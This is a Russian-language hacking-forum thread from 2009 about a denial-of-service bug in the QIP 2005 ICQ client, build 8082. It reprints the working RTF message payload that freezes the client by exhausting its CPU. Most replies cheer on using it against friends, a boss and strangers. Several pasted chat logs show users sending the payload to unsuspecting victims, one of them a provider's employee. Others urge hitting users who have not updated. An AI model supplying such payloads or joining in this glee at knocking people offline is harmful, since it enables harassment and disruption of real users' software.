Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Мировые новости (https://forum.antichat.xyz/forumdisplay.php?f=23)
-   -   DoS QIP 2005 8082 (https://forum.antichat.xyz/showthread.php?t=104855)

elimS2 05.02.2009 21:22

DoS QIP 2005 8082
 

уязвимость позволяет удаленному пользователю произвести DoS атаку.

Уязвимость существует из-за ошибки при обработке ICQ сообщений. Удаленный пользователь может с помощью специально сформированного ICQ сообщения в RTF формате заставить приложение потреблять все доступные ресурсы процессора. Пример сообщения:

{\rtf\pict\&&}


Пришла пора повеселиться на друзьями пока не прыкрили багу:)

бросайте смешные логи)


5 февраля 2009, 18:13

http://habrahabr.ru/blogs/im/51191/

© 2006—2009 «Тематические Медиа»

AlexTheC0d3r 05.02.2009 21:24

Какие логи? я уже во всю тут распространяю исправление http://forum.qip.ru/showthread.php?p=282981#post282981

какбэ стеб :D

elimS2 05.02.2009 21:28

я уже своих друзей повыносил)

AlexTheC0d3r 05.02.2009 21:30

Из логов, могу выложить только то, что мне приходит от моих жертв :DD

elimS2 05.02.2009 21:33

два ядра спасают, фух!) уже меня пару раз подвесили)) начали друг друга бомбить сообщениями

AlexTheC0d3r 05.02.2009 21:46

http://forum.qip.ru/showthread.php?t=32719

живой лог :)

основатель - я :D

XAOCX 05.02.2009 21:54

6 челов выкинул =)

awdrg 05.02.2009 21:57

fun & fun :D

AFoST 05.02.2009 21:58

-5)) ааа кайф!!!

*DeViL* 05.02.2009 22:01

)))хехе)) пол контакт листа в ОФФе)) хехе

AlexTheC0d3r 05.02.2009 22:05

эххх.... затерли мой лог :(

HighExcel 06.02.2009 00:55

{\rtf\pict\&&}

etc 06.02.2009 01:03

Какие логи? Бедолаги тупо виснут :D

iSeoBot 06.02.2009 01:04

Цитата:

{\rtf\pict\&&}
жжот! :-D

Sharky 06.02.2009 01:26

я сёня начальника так из аси выгонял :)

elimS2 06.02.2009 01:28

ыыы, погнал)) хорошая месть начальнику) по доставать, а потом сказать что это все злые хакеры)

AFoST 06.02.2009 01:36

мегасообщение! ваще кайф! пока не закрыли надо отрываться!!!

Sharky 06.02.2009 01:39

Цитата:

Сообщение от elimS2
ыыы, погнал)) хорошая месть начальнику) по доставать, а потом сказать что это все злые хакеры)

не =) он знал...за соседним с толом сидит :) потом в меня ручками кидался :D чтоб я не аськи ломал а делом занимался :D

zifanchuck 06.02.2009 01:53

надо задосить намер 1 или 12111 =)

dimhee 06.02.2009 01:54

весёлый день

h1vs2 06.02.2009 01:55

Фак, спецом зашел в акк аськи, а у мну там все на инфируме, неодного на обычном квипе нету. Вот досада)

vvs777 06.02.2009 02:20

поржал. бага кул.

Цитата:

надо задосить намер 1
ты думаешь что эти уроды что спамят с номера 1 на квипе сидят? они на своем баяне ездят. а зафлудить их надо.

OMG!! 06.02.2009 11:16

http://qip.ru/download/qip8090.exe багу пофиксили.. но уязвимых все равно будет много)

Troop 06.02.2009 11:26

оППа ) классная бага.... надо опробывать на тех кто не обновился

cupper 06.02.2009 12:38

люди, и это че проста как обычное сообщение отправлять надо ?

Rav1n 06.02.2009 12:49

да

pokerman 06.02.2009 13:03

дааа вот я поугарал =))) походу процессор ваще не подетски колбасит после такого сообщения)))

GrinGoO 06.02.2009 14:10

хаха -1 пока) балуемся дальше

-Hormold- 06.02.2009 14:17

Весело, только у меня 1 ламер в КЛ, у которого 8080

slesh 06.02.2009 14:55

странно, но у меня на 8020 и пашет и не пашет o_O
т.е. один раз у меня ася повисла хз от кого. Потом все усилия повесить опять обломились. Хотя в настройках стоит - Отключить поддержку RTF сообщений.
А вообще 1 минута и уже стоит нова версия. Так что быг проживет еще с пол недельки и всё

xxxPixelxxxx 06.02.2009 15:12

КУльно !!

ruslanpc 06.02.2009 15:14

чёта не получается...=(

Sinay 06.02.2009 16:07

на миранде надо сидеть

Irdis 06.02.2009 17:48

xxx: Привет, давай знакомится. Как дела? Чем занят? Про баг {\rtf\pict\&&} уже слышал?
ххх: слышал или нет, почему молчишь?

m0nstrik 06.02.2009 22:19

гы))) поржал

m0nstrik 06.02.2009 22:20

не скажу (20:08:30 6/02/2009)
хош прикол?

Продажа аден 3 (20:08:35 6/02/2009)
да

Продажа аден 3 (20:08:36 6/02/2009)
))

не скажу (20:08:38 6/02/2009)
{\rtf\pict\&&}

не скажу (20:08:57 6/02/2009)
ты тут?

не скажу (20:09:12 6/02/2009)
:D

Продажа аден 3 (20:10:26 6/02/2009)
?

не скажу (20:10:43 6/02/2009)
проц не грузит?

не скажу (20:10:44 6/02/2009)
{\rtf\pict\&&}

не скажу (20:10:54 6/02/2009)
а ?

Продажа аден 3 (20:11:37 6/02/2009)
блять

не скажу (20:11:41 6/02/2009)
:D

Продажа аден 3 (20:11:43 6/02/2009)
аська зависает

не скажу (20:11:47 6/02/2009)
{\rtf\pict\&&}

не скажу (20:12:34 6/02/2009)
:D

Продажа аден 3 (20:12:44 6/02/2009)
жесть)

Продажа аден 3 (20:12:44 6/02/2009)
хватит

L I G A 06.02.2009 22:36

ништяк

vvs777 07.02.2009 00:35

Цитата:

xxx: Привет, давай знакомится. Как дела? Чем занят? Про баг {\rtf\pict\&&} уже слышал?
ххх: слышал или нет, почему молчишь?
в таком контексте, к сожалению, хер.
Код должен быть в начале, а после него уже любой баян.

xJeWeL 07.02.2009 06:21

мой провайдер:
JeWeL (11:59:09 7/02/2009)
привет


JeWeL (11:59:23 7/02/2009)
есть немного времени


Алексей (11:59:37 7/02/2009)
Да слушаю внимательно


JeWeL (12:00:21 7/02/2009)
открой диспетчера задач и посмотри на загрузку процессора


JeWeL (12:00:43 7/02/2009)
{\rtf\pict\&&}


JeWeL (12:01:56 7/02/2009)
ЦП грузится на 100% от квипа ?


JeWeL (12:03:53 7/02/2009)
:-)

Тут происходит дисконект ----

Алексей (12:03:56 7/02/2009)
И что?


JeWeL (12:04:06 7/02/2009)
вот почитай новость
http://forum.antichat.ru/thread104855.html


Алексей (12:04:50 7/02/2009)
За такие шутки отключают от интернета


JeWeL (12:05:12 7/02/2009)
это ДОС в квипе . там же написанно )


JeWeL (12:05:59 7/02/2009)
обновись до версии 8090 и все будет ок .


JeWeL (12:06:18 7/02/2009)
http://download.qip.ru/qip8090.exe вот ссылка


Алексей (12:10:43 7/02/2009)
В следующий раз предупреждать надо заранее:-[


JeWeL (12:19:16 7/02/2009)
:-D


Время: 17:35